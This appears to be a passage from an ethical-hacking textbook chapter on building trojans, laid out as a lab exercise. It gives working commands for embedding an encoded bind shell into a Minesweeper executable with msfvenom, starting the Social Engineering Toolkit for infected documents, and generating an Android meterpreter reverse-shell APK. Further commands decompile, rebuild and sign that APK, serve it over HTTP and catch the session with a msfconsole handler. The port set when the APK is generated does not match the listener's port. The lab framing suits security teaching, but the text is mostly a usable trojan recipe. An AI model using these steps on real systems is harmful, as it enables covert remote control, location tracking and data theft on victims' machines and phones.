Ethical.Hacking.2021.10:BUILDING TROJANS(2)

Creating a Windows Trojan

We’ll cover two methods of hiding your implant: in a fun, open source implementation of the game Minesweeper by Humaeed Ahmed, and in a document using the Social Engineering Toolkit (more on this in a moment).

Hiding the Trojan in Minesweeper

I’ve forked Ahmed’s repository, and you can download a copy of the executable from
the following link: https://github.com/The-Ethical-HackingBook/Minesweeper/blob/master/Minesweeper/bin/Debug/Minesweeper.exe. Save it to
your Malware folder on your Kali desktop.

After you’ve downloaded the executable, use msfvenom to transform it into a
malicious trojan by running the following command:

msfvenom -a x86 --platform windows -x program.exe -k -p windows/shell/bind_tcp -e x86/shikata_ga_nai lhost=<Kali IP address> -f exe -o evilProgram.exe

Hiding the Trojan in a Word Document (or Another Innocent File)

The Social Engineering Toolkit (SET) abstracts the
Metasploit Framework’s details and makes it easy to send and generate this kind of
infected media. Run the following command to start SET:

kali@kali:~$ sudo setoolkit


Creating an Android Trojan

Generate a new malicious APK that contains a reverse shell implant by running the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Kali IP address> LPORT=443 > malicious.apk

Deconstructing the APK to View the Implant

We’ll use apktool, a reverse engineering tool, to decompile the APK. Run the
following command to download and install apktool:

sudo apt-get install apktool
kali@kali:~/Desktop/AndroidTrojan$ apktool d malicious.apk

Similarly, you can create your own trojan by decompiling an existing APK, copying
the Metasploit folder to the smali folder, and then adding the preceding snippet to
MainActivity.smali to start the payload.

Rebuilding and Signing the APK

apktool build ~/Desktop/AndroidTrojan/malicious -o malicious2.apk

All Android apps must be signed before they can be run on an Android device. You
can do this with the Java Keystore, which stores and protects key material such as the
public and private keys used for signing. Key material never leaves the Keystore.
Instead, an application sends the Keystore its data, and the Keystore uses the
protected key material to sign or encrypt data and returns the results, as illustrated in
Figure 10-10. Some systems even store key material in a separate piece of secure
hardware called a trusted execution environment.

Run the following command to install the Java Development Kit (JDK), which
contains the tools we’ll use to sign the trojan APK:

sudo apt install -y default-jdk

Generate the RSA key we’ll use to sign the trojan by using this command:

keytool -genkey -keystore my-malicious.keystore -alias alias_name_malicious -keyalg RSA -keysize 3072 -validity 10000

Now use Java’s jarsigner utility to sign the APK file:

jarsigner -sigalg SHA256withRSA -digestalg SHA-256 -keystore my-malicious.keystore malicious2.apk alias_name_malicious

Testing the Android Trojan

Follow the instructions at
https://developer.android.com/studio/install/ to download Android Studio on your host
system, outside of your current virtual lab environment.

Put Kali and the newly created Android virtual machine on the same LAN.

Start a web server in the folder containing your signed malicious APK:

sudo python3 -m http.server 80

Now start the attacker server in a new terminal (this starts the msf server-side listener):

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD
android/meterpreter/reverse_tcp; set LHOST <Kali IP address>; set
LPORT 8443; run; exit -y"

Download and install malicious2.apk in the Android virtual machine.

Try typing geolocate to get the phone
location. (Remember, the phone is running in a virtual machine and doesn’t have
access to GPS, so this location will be simulated.) Also run the help command to see all
of your options. Meterpreter isn’t perfect, so some options might not work.
